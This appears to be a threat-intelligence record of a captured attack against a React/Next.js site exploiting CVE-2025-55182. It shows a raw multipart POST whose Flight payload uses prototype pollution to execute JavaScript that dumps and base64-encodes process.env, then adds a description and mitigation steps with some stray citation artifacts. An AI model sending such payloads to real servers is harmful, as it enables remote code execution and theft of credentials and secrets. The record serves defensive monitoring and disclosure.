Информация об атаке

Tag
 
CVE-2025-55182
Date
 
2026-05-09
Client IP
 
5.35.98.193
Client GEO
 
russia
Vendor
 
Meta
Product
 
React
RAW request
 
POST /login HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/█████████ Safari/537.36
Host: blog.██████
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzZJfasYaDdqK
Content-Length: 1051
X-Forwarded-For: ███████████
Accept-Encoding: gzip
Next-Action: x
Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D
Next-Url: /login
Origin: https://blog.██████
Referer: https://blog.██████/login
X-Ja3-Fingerprint: e69402f870ecf542b4f017b0ed32936a
X-Ja4-Fingerprint: t13d1312h2_f57a46bbacb6_e5728521abd4
X-Nextjs-Html-Request-Id: k1Cbfge8Fa
X-Nextjs-Request-Id: 5FBX6NW2bY
Connection: close

------WebKitFormBoundaryzZJfasYaDdqK
Content-Disposition: form-data; name="EVMjtElJ"

7K1qukPEpQk5M3XR0vdaJ9/Z9dVA9zLbyudZP+92DYMvplCP6qJGnQdnZQsrZksMFoHG0yYKa0BzYTuelO0iVjOwmtQ8wmrjbmAUIEc6BSFeSHg9oPB0Rs9oa50JY+JJWPfcVdq+Av+bBJLg7OllBhT9aga3gumxg3B8nSchHG3eXsykFQDt9Xrtu+gV71SaSZXBY3017FagO5CviSE4QqIjSPjU9fDv6N/B5HykMZqqeFjyYuR4MyHwfQYp2SaR
------WebKitFormBoundaryzZJfasYaDdqK
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var env=typeof process!=='undefined'?JSON.stringify(process.env):'{}';var b64=Buffer.from(env).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest: 'NEXT_REDIRECT;push;/login?a='+b64+';307;'});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryzZJfasYaDdqK
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryzZJfasYaDdqK
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryzZJfasYaDdqK--
Description
 
CVE-2025-55182 affects react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack versions 19.0.0, 19.1.0, 19.1.1 and 19.2.0. :contentReference


The root cause is unsafe deserialization in the RSC “Flight” protocol: when the server receives a specially crafted payload via HTTP request to a Server Function endpoint, the payload is deserialized without proper validation. This can lead to prototype-pollution, or injection of malicious objects, which allows execution of arbitrary JS code — effectively an RCE. 


The attack requires no authentication, has low complexity, and can be triggered via a single HTTP request. 


Because many popular frameworks (e.g. Next.js, React Router, Waku, Parcel/Vite RSC plugins, rwsdk) rely on the vulnerable packages, a large portion of web-apps are at risk.


The vulnerability was publicly disclosed on December 3, 2025, and patches released shortly after.
Mitigations
 
    

  1. Upgrade React-server-dom packages: Immediately update affected packages to patched versions (for example react-server-dom-webpack/par­cel/turbopack → 19.0.1, 19.1.2 или 19.2.1).
    2. 

  2. Audit dependencies: Проверьте, не включены ли в проект фреймворки или сборщики, использующие RSC (например Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, rwsdk), и обновите их до безопасных версий. :contentReference
    3. 

  3. Disable or restrict RSC endpoints: Если возможно — временно отключите серверные функции React (Server Functions) или ограничьте доступ к ним через firewall / WAF / настройку сети. :contentReference
    4. 

  4. Runtime protection: Используйте WAF, EASM/ASM, мониторинг поведения, IDS/IPS, чтобы обнаруживать подозрительные запросы и пост-эксплуатационную активность. :contentReference
    5. 

  5. Code review / validation: Пересмотрите обработку входящих данных, избегайте десериализации непроверенных объектов, особенно если приложение принимает пользовательские payload’ы. (Может потребоваться дополнительная проверка/валидация deserialized data.)
    6.
Links
https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components